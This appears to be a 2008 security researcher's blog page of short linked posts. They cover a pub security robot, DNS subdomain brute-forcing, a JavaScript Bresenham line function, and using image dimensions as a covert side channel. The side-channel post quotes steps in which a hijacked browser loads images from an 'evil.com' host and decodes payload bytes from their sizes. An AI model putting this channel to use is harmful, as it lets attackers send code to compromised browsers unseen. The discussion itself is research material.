| |
| I am a hacker and you are afraid and that makes you more dangerous than I ever could be. |
|
Who needs security when you have a robot? | ajc.com |
|
|
|---|
| Topic: Current Events |
12:44 pm EST, Feb 22, 2008 |
Late at night several times a week, Terrill powers up the 4-foot-tall, 300 pound device and reaches for a remote control packed with two joysticks and various knobs and switches. Standing on a nearby corner, he maneuvers the machine down the block, often to a daycare center where it accosts what Terrill says are drug dealers, vagrants and others who shouldn't be there. He flashes the robot's spotlight and grabs a walkie-talkie, which he uses to boom his disembodied voice over the robot's sound system. "I tell them they are trespassing, it's private property, and they have to leave," he said. "They throw bottles and cans at it. That's when I shoot the water cannon. They just scatter like roaches."
OMG, I can't believe he actually built it, and I can't believe it actually works. You now have something more to look forward to at O'Terrill's besides the fish and chips! Who needs security when you have a robot? | ajc.com |
|
|
|---|
| Topic: Miscellaneous |
5:42 pm EST, Feb 19, 2008 |
"There is a non-zero chance that the DOJ would fuck with you." |
|
Subdomain bruting and you! |
|
|
|---|
| Topic: Technology |
10:41 am EST, Feb 19, 2008 |
Old timers here will know about the concept of bruteforcing DNS using the clues available.. i.e. zone transfers disabled, but u see that the NS and MX servers are called gandalf.company.com and elrond.company.com. Effectively trying frodo.company.com is going to make good sense.. To this end BidiBlah will do this automagically for u and tries to eek out info.. (a little while back i saw fierce-scanner pop up in a similar vein!) Young Mr Wilkinson ran up against a company last night with disabled transfers, but the 2 DNS servers showed up as: * asimov.company.com
* heinlein.company.com A quick trip to wikipedia shows that both are american sci-fi authors.
Very cool! A DNS Bruter using Wikipedia/Google to attempt to find relationships between subdomains. Bruting is fairly straight forward, and the trick has always been what values you should try. I faced this challenge about a month ago when I wrote a DNS bruter. Over the last 3 years or so I've made something of a hobby of collecting massive sets of URLs. At last count I had just under 90 million. I mined these and created a list of the 1000 most common subdomains. Not as sexy as Bidiblah, but effective. Subdomain bruting and you! |
|
|
|---|
| Topic: Miscellaneous |
5:30 pm EST, Feb 18, 2008 |
Jason Scott on the opinionated hordes. I had forgotten, I guess, how easy it is for people to take a few quick glances at some data and shove their two-line thesis out the door. Or to then proceed to make even more conclusions based on this thesis. And then, how easily it is for this quarter-baked half-thesis to become an addendum to the original data, as if, you know, they deserved it. I like nothing more than to browse people who have no idea who or what the hell I am, what I've done, what I'm doing, or any other data points, and then just make all these great conclusions about me. It's refreshing. They're neither friend nor foe. They're just observers, as so much of this medium turns us into
And of course, the original Penny Arcade Internet Fuckwad strip. Internet Fuckwad Redux |
|
Bresenham's line algorithm |
|
|
|---|
| Topic: Miscellaneous |
5:08 am EST, Feb 18, 2008 |
DrawingSpace.prototype.drawLine = function(x0,y0,x1,y1) {
var steep = Math.abs(y1 - y0) > Math.abs(x1 - x0);
var tmp = 0;
if(steep) {
//swap(x0, y0)
tmp = y0;
y0 = x0;
x0 = tmp;
//swap(x1, y1)
tmp = y1;
y1 = x1;
x1 = tmp;
}
if(x0 > x1) {
//swap(x0, x1)
tmp = x1;
x1 = x0;
x0 = tmp;
//swap(y0, y1)
tmp = y0;
y0 = y1;
y1 = tmp;
}
var deltax = x1 - x0;
var deltay = Math.abs(y1 - y0)
var error = -(deltax + 1) / 2
var ystep;
var y = y0;
if(y0 < y1) {
ystep = 1;
} else {
ystep = -1;
}
for(var x = x0; x <=x1; x++) {
if(steep) {
this.buffer.setXY(y,x);
} else {
this.buffer.setXY(x,y);
}
error += deltay;
if(error >=0) {
y += ystep;
error -=deltax;
}
}
}
Now why would you ever need an integer optimized line drawing algorithm in JavaScript? :-) Bresenham's line algorithm |
|
|
|---|
| Topic: Miscellaneous |
9:11 am EST, Feb 15, 2008 |
Today I used the phrase "John Terrill Approved" to win an argument. Yes, it was excellent. |
|
|
|---|
| Topic: Miscellaneous |
9:58 pm EST, Feb 14, 2008 |
Events can be set to trap when the image has finished loading and what the size of the image is. This creates a side channel for JavaScript to communicate with certain 3rd party hosts using the dimensions of the image. In practice, XBM images tend to work best because you can specify arbitrary lengths and widths up to a 15bit integer without actually needing an image of that size.
I knew I had talked about this publicly before! This was from Jan of 2007. Good to know I'm not going crazy :-) More image side channels |
|
Using Image Dimensions as a side channel |
|
|
|---|
| Topic: Technology |
1:16 pm EST, Feb 14, 2008 |
Arshan over at Aspect posted something that sounds very familiar indeed over on his blog. Disclaimer: I know this isn’t earth-shattering now when the sandbox isn’t there, but I think it’s cool that using image tags we can create a completely covert channel for bypassing the same origin policy and control browsers remotely. Just to be clear, this is not a traditional same-origin bypass where we’re on http://evil.com/ and we’re talking to http://mybank.com/. We’re talking about a hijacked client who’s in collusion with an evil server that wants to deliver the client some message, be it a code payload, instructions, etc. Can we restrict JavaScript from dynamically loading image tags? No more image pre-loading? I doubt it! Here’s how it works. * Client dynamically creates an Image() and points the source to http://evil.com/evil.cgi?password=somesecret
* Server responds with an image that has a 16 pixels tall and 1 pixel wide (16 represents in this phase the total length of the payload)
* Client then starts a loop that iterates 16/2 times:
o Client dynamically creates a new Image() and points the source to http://evil.com/evil.cgi?password=somesecret&i=
o The new image that has height x, width y
o Client appends ASCII character value of x onto payload string
o Client appends ASCII character value of y onto payload string
* Client now has authenticated, 16-length payload to do whatever they want with
Hehe. I was wondering when someone would talk about this! John Terrill and I looked at this back late 2006, early 2007 and took this alittle further than Arshan did. Here is what we came up with: The carry capacity of a side channel is an important factor. Arshan's solution is not very good because of the limited capacity. How can we use dimenstions as a side channel and not have to send tens of kilobytes to transer a few bytes of data in the side channel? Thats the "$1,000,000 and a Monster Truck" question which started John and I researching. Lets take GIF images. According to the spec, length and width are 16 bit integers, giving us 4 bytes of data. However if I need to send 0xFFFFFFFF it would suck to have to transmit an image that is 65535x65535. That would be huge. But GIFs are compressed right? Remember that JavaScript cannot access pixel data of the Image objects it creates, so we really don't care about whats in this picture. What if we make it all white? That should compress well. While it does, you are still sending a... [ Read More (0.5k in body) ] Using Image Dimensions as a side channel |
|
